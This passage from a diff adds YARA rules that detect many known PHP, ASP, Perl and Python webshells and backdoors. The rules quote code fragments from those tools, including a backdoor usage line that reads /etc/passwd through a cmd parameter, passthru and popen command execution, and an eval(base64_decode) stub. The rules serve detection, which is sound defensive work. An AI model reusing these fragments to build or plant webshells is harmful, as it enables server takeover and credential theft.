+      $s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b" 
+   condition: 
+      1 of ( $s* ) and $Author
+}
+
+rule Webshell_Casus15_php_php_RID3059 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Casus15.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:36:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na" 
+      $s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'" 
+      $s3 = "value='Calistirmak istediginiz " 
+   condition: 
+      1 of them
+}
+
+rule Webshell_fuckphpshell_php_RID3156 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file fuckphpshell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:18:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$succ = \"Warning! " 
+      $s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!" 
+      $s2 = "\\*=-- MEMBERS AREA --=*/" 
+      $s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php_RID3D96 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 22:00:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend" 
+      $s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim" 
+      $s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_RemExp_asp_RID2E9A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file RemExp.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:21:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<title>Remote Explorer</title>" 
+      $s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi" 
+      $s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_klasvayv_asp_RID2FBA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file klasvayv.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:09:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "set aktifklas=request.querystring(\"aktifklas\")" 
+      $s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" 
+      $s3 = "<font color=\"#858585\">www.aventgrup.net" 
+      $s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_wh_bindshell_py_RID30E1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file wh_bindshell.py.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:58:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "#Use: python wh_bindshell.py [port] [password]" 
+      $s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+      $s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_lurm_safemod_on_cgi_RID3272 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file lurm_safemod_on.cgi.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:05:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Network security team :: CGI Shell" fullword
+      $s1 = "#########################<<KONEC>>#####################################" fullword
+      $s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_backupsql_php_often_with_c99shell_RID37F5 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file backupsql.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 18:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ." 
+      $s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog" 
+   condition: 
+      all of them
+}
+
+rule Webshell_uploader_php_php_RID3150 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file uploader.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+      $s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+      $s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_Dx_php_php_RID2EB0 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Dx.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:25:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" 
+      $s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util" 
+      $s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Rem_View_php_php_RID3112 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Rem View.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:06:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"" 
+      $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'" 
+      $s4 = "Welcome to phpRemoteView (RemView)" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Java_Shell_js_RID2FBB : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Java Shell.js.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+      $s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+      $s4 = "public static int DEFAULT_SCROLLBACK = 100" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Moroccan_Spamers_Ma_EditioN_By_GhOsT_php_RID3A0F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 19:30:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = ";$sd98=\"john.barker446@gmail.com\"" 
+      $s1 = "print \"Sending mail to $to....... \";" 
+      $s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_simple_backdoor_php_RID327B : DEMO MAL T1087 T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file simple-backdoor.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:07:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+      $s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" 
+      $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_Dive_Shell_1_0___Emperor_Hacking_Team_php_RID3A3C : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 19:37:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Emperor Hacking TEAM" 
+      $s1 = "Simshell" fullword
+      $s2 = "ereg('^[[:blank:]]*cd[[:blank:]]" 
+      $s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Asmodeus_v0_1_pl_RID30B7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Asmodeus v0.1.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[url=http://www.governmentsecurity.org" 
+      $s1 = "perl asmodeus.pl client 6666 127.0.0.1" 
+      $s2 = "print \"Asmodeus Perl Remote Shell" 
+      $s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_phpshell17_php_RID3015 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file phpshell17.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:24:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+      $s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></" 
+      $s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_myshell_php_php_RID30F2 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file myshell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:01:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory." 
+      $s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color" 
+      $s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_SimShell_1_0___Simorgh_Security_MGZ_php_RID3987 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 19:07:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Simorgh Security Magazine " 
+      $s1 = "Simshell.css" 
+      $s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], " 
+      $s3 = "www.simorgh-ev.com" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_rootshell_php_RID3029 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file rootshell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:28:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "shells.dl.am" 
+      $s1 = "This server has been infected by $owner" 
+      $s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>" 
+      $s4 = "Could not write to file! (Maybe you didn't enter any text?)" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_connectback2_pl_RID308E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file connectback2.pl.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   " 
+      $s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel" 
+      $s2 = "ConnectBack Backdoor" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_DefaceKeeper_0_2_php_RID3201 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file DefaceKeeper_0.2.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+      $s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9" 
+      $s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_elmaliseker_asp_RID30D7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file elmaliseker.asp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:57:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\"" 
+      $s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">" 
+      $s2 = "dim zombie_array,special_array" 
+      $s3 = "http://vnhacker.org" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_s72_Shell_v1_1_Coding_html_RID3436 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:20:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><" 
+      $s1 = "s72 Shell v1.0 Codinf by Cr@zy_King" 
+      $s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Antichat_Socks5_Server_php_php_RID368D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 17:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+      $s3 = "#   [+] Domain name address type" 
+      $s4 = "www.antichat.ru" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php_RID3A0D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 19:30:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy" 
+      $s1 = "Mode Shell v1.0</font></span>" 
+      $s2 = "has been already loaded. PHP Emperor <xb5@hotmail." 
+   condition: 
+      1 of them
+}
+
+rule Webshell_mysql_php_php_RID302A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file mysql.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:28:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "action=mysqlread&mass=loadmass\">load all defaults" 
+      $s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru" 
+      $s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = " 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Worse_Linux_Shell_php_RID3323 : DEMO LINUX SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Worse Linux Shell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:35:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, LINUX, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td" 
+      $s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_cyberlords_sql_php_php_RID33DC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file cyberlords_sql.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:05:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Coded by n0 [nZer0]" 
+      $s1 = " www.cyberlords.net" 
+      $s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE" 
+      $s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_pws_php_php_RID2F4E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file pws.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:51:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+      $s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+      $s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_PHP_Shell_php_php_RID3133 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file PHP Shell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:12:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" 
+      $s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html_RID39CD : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 19:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Ayyildiz" 
+      $s1 = "TouCh By iJOo" 
+      $s2 = "First we check if there has been asked for a working directory" 
+      $s3 = "http://ayyildiz.org/images/whosonline2.gif" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Ajax_PHP_Command_Shell_php_RID348D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:35:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>" 
+      $s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help" 
+      $s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_JspWebshell_1_2_jsp_RID31D6 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file JspWebshell 1.2.jsp.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:39:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "JspWebshell" 
+      $s1 = "CreateAndDeleteFolder is error:" 
+      $s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c" 
+      $s3 = "String _password =\"111\";" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Phyton_Shell_py_RID30C7 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Phyton Shell.py.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:54:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+      $s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+      $s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+      $s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_mysql_tool_php_php_RID3247 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file mysql_tool.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:58:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['" 
+      $s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV" 
+      $s4 = "<div align=\"center\">The backup process has now started<br " 
+   condition: 
+      1 of them
+}
+
+rule Webshell_phpbackdoor15_php_RID3140 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file phpbackdoor15.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:14:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na" 
+      $s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI" 
+      $s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_cgi_python_py_RID3022 : DEMO SCRIPT T1059_006 T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file cgi-python.py.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:26:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1059_006, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "a CGI by Fuzzyman" 
+      $s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + " 
+      $s2 = "values = map(lambda x: x.value, theform[field])     # allows for" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_ru24_post_sh_php_php_RID32A0 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file ru24_post_sh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:13:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
